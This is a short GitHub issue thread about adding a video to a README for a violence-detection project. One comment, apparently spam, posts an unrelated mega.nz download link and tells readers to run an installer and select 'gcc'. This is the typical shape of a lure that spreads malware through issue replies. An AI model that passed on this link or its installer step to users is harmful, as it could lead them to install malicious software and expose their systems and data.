### ISSUE TITLE
Add video for README

### ISSUE THREAD

**Issue by HenIsrael** [HenIsrael/Violence_Detection#1]
https://github.com/user-attachments/assets/d89478bf-4044-4e43-b782-013a1fe8490d

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by HenIsrael** [comment]
video upload success
